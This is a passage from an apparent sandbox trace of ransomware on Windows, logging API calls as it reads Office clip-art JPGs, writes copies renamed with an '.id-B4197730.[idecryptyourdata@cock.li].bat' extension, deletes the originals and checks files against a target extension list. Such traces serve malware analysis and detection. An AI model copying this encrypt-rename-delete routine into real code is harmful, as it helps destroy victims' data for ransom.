Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.370] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=21125) returned 1 [0185.370] CloseHandle (hObject=0x378) returned 1 [0185.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg")) returned 0x220 [0185.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0185.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.370] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.370] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0185.371] GetLastError () returned 0x0 [0185.371] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x5285, lpOverlapped=0x0) returned 1 [0188.037] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x5290, lpOverlapped=0x0) returned 1 [0188.039] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.039] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.039] SetEndOfFile (hFile=0x37c) returned 1 [0188.039] CloseHandle (hObject=0x37c) returned 1 [0188.040] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.040] SetEndOfFile (hFile=0x378) returned 1 [0188.041] CloseHandle (hObject=0x378) returned 1 [0188.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.041] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg")) returned 1 [0188.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.041] lstrlenW (lpString=".doc") returned 4 [0188.041] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.041] lstrlenW (lpString=".docx") returned 5 [0188.041] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1 [0188.041] lstrlenW (lpString=".pdf") returned 4 [0188.041] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.041] lstrlenW (lpString=".xls") returned 4 [0188.042] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.042] lstrlenW (lpString=".xlsx") returned 5 [0188.042] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1 [0188.042] lstrlenW (lpString=".ppt") returned 4 [0188.042] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.042] lstrlenW (lpString=".zip") returned 4 [0188.042] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.042] lstrlenW (lpString=".rar") returned 4 [0188.042] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.042] lstrlenW (lpString=".bz2") returned 4 [0188.042] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.042] lstrlenW (lpString=".7z") returned 3 [0188.042] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.042] lstrlenW (lpString=".dbf") returned 4 [0188.042] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.042] lstrlenW (lpString=".1cd") returned 4 [0188.042] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.042] lstrlenW (lpString=".jpg") returned 4 [0188.042] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.042] lstrlenW (lpString=".doc") returned 4 [0188.042] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.042] lstrlenW (lpString=".docx") returned 5 [0188.042] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1 [0188.043] lstrlenW (lpString=".pdf") returned 4 [0188.043] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.043] lstrlenW (lpString=".xls") returned 4 [0188.043] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.043] lstrlenW (lpString=".xlsx") returned 5 [0188.043] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1 [0188.043] lstrlenW (lpString=".ppt") returned 4 [0188.043] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.043] lstrlenW (lpString=".zip") returned 4 [0188.043] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.043] lstrlenW (lpString=".rar") returned 4 [0188.043] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.043] lstrlenW (lpString=".bz2") returned 4 [0188.043] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.043] lstrlenW (lpString=".7z") returned 3 [0188.043] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.043] lstrlenW (lpString=".dbf") returned 4 [0188.043] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.043] lstrlenW (lpString=".1cd") returned 4 [0188.043] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 68 [0188.043] lstrlenW (lpString=".jpg") returned 4 [0188.043] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.044] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0188.044] lstrlenW (lpString="J0145810.JPG") returned 12 [0188.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0188.044] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=36792) returned 1 [0188.044] CloseHandle (hObject=0x378) returned 1 [0188.044] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg")) returned 0x220 [0188.045] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0188.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0188.045] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.045] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0188.046] GetLastError () returned 0x0 [0188.046] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x8fb8, lpOverlapped=0x0) returned 1 [0188.110] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x8fc0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x8fc0, lpOverlapped=0x0) returned 1 [0188.112] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.112] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.112] SetEndOfFile (hFile=0x37c) returned 1 [0188.112] CloseHandle (hObject=0x37c) returned 1 [0188.112] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.112] SetEndOfFile (hFile=0x378) returned 1 [0188.113] CloseHandle (hObject=0x378) returned 1 [0188.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.114] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg")) returned 1 [0188.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.114] lstrlenW (lpString=".doc") returned 4 [0188.114] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.114] lstrlenW (lpString=".docx") returned 5 [0188.114] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0188.114] lstrlenW (lpString=".pdf") returned 4 [0188.114] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.114] lstrlenW (lpString=".xls") returned 4 [0188.114] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.114] lstrlenW (lpString=".xlsx") returned 5 [0188.114] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0188.114] lstrlenW (lpString=".ppt") returned 4 [0188.115] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.115] lstrlenW (lpString=".zip") returned 4 [0188.115] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.115] lstrlenW (lpString=".rar") returned 4 [0188.115] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.115] lstrlenW (lpString=".bz2") returned 4 [0188.115] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.115] lstrlenW (lpString=".7z") returned 3 [0188.115] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.115] lstrlenW (lpString=".dbf") returned 4 [0188.115] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.115] lstrlenW (lpString=".1cd") returned 4 [0188.115] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.115] lstrlenW (lpString=".jpg") returned 4 [0188.115] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.115] lstrlenW (lpString=".doc") returned 4 [0188.115] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.115] lstrlenW (lpString=".docx") returned 5 [0188.116] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0188.116] lstrlenW (lpString=".pdf") returned 4 [0188.116] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.116] lstrlenW (lpString=".xls") returned 4 [0188.116] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.116] lstrlenW (lpString=".xlsx") returned 5 [0188.116] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0188.116] lstrlenW (lpString=".ppt") returned 4 [0188.116] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.116] lstrlenW (lpString=".zip") returned 4 [0188.116] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.116] lstrlenW (lpString=".rar") returned 4 [0188.116] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.116] lstrlenW (lpString=".bz2") returned 4 [0188.116] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.116] lstrlenW (lpString=".7z") returned 3 [0188.116] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.116] lstrlenW (lpString=".dbf") returned 4 [0188.116] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.117] lstrlenW (lpString=".1cd") returned 4 [0188.117] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG") returned 68 [0188.117] lstrlenW (lpString=".jpg") returned 4 [0188.117] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.117] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0188.117] lstrlenW (lpString="J0148309.JPG") returned 12 [0188.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0188.118] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=43674) returned 1 [0188.118] CloseHandle (hObject=0x378) returned 1 [0188.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg")) returned 0x220 [0188.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0188.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0188.118] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.118] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0188.119] GetLastError () returned 0x0 [0188.119] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xaa9a, lpOverlapped=0x0) returned 1 [0188.122] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xaaa0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xaaa0, lpOverlapped=0x0) returned 1 [0188.129] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.129] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.129] SetEndOfFile (hFile=0x37c) returned 1 [0188.130] CloseHandle (hObject=0x37c) returned 1 [0188.130] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.130] SetEndOfFile (hFile=0x378) returned 1 [0188.131] CloseHandle (hObject=0x378) returned 1 [0188.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.131] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg")) returned 1 [0188.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.131] lstrlenW (lpString=".doc") returned 4 [0188.131] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.131] lstrlenW (lpString=".docx") returned 5 [0188.132] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1 [0188.132] lstrlenW (lpString=".pdf") returned 4 [0188.132] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.132] lstrlenW (lpString=".xls") returned 4 [0188.132] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.132] lstrlenW (lpString=".xlsx") returned 5 [0188.132] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1 [0188.132] lstrlenW (lpString=".ppt") returned 4 [0188.132] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.132] lstrlenW (lpString=".zip") returned 4 [0188.132] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.132] lstrlenW (lpString=".rar") returned 4 [0188.132] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.132] lstrlenW (lpString=".bz2") returned 4 [0188.132] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.132] lstrlenW (lpString=".7z") returned 3 [0188.132] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.132] lstrlenW (lpString=".dbf") returned 4 [0188.132] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.132] lstrlenW (lpString=".1cd") returned 4 [0188.132] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.132] lstrlenW (lpString=".jpg") returned 4 [0188.132] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.132] lstrlenW (lpString=".doc") returned 4 [0188.133] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.133] lstrlenW (lpString=".docx") returned 5 [0188.133] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1 [0188.133] lstrlenW (lpString=".pdf") returned 4 [0188.133] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.133] lstrlenW (lpString=".xls") returned 4 [0188.133] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.133] lstrlenW (lpString=".xlsx") returned 5 [0188.133] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1 [0188.133] lstrlenW (lpString=".ppt") returned 4 [0188.133] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.133] lstrlenW (lpString=".zip") returned 4 [0188.133] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.133] lstrlenW (lpString=".rar") returned 4 [0188.133] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.133] lstrlenW (lpString=".bz2") returned 4 [0188.133] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.133] lstrlenW (lpString=".7z") returned 3 [0188.133] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.133] lstrlenW (lpString=".dbf") returned 4 [0188.133] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.133] lstrlenW (lpString=".1cd") returned 4 [0188.133] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG") returned 68 [0188.134] lstrlenW (lpString=".jpg") returned 4 [0188.134] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.134] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0188.134] lstrlenW (lpString="J0148757.JPG") returned 12 [0188.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0188.135] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=67540) returned 1 [0188.135] CloseHandle (hObject=0x378) returned 1 [0188.135] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: 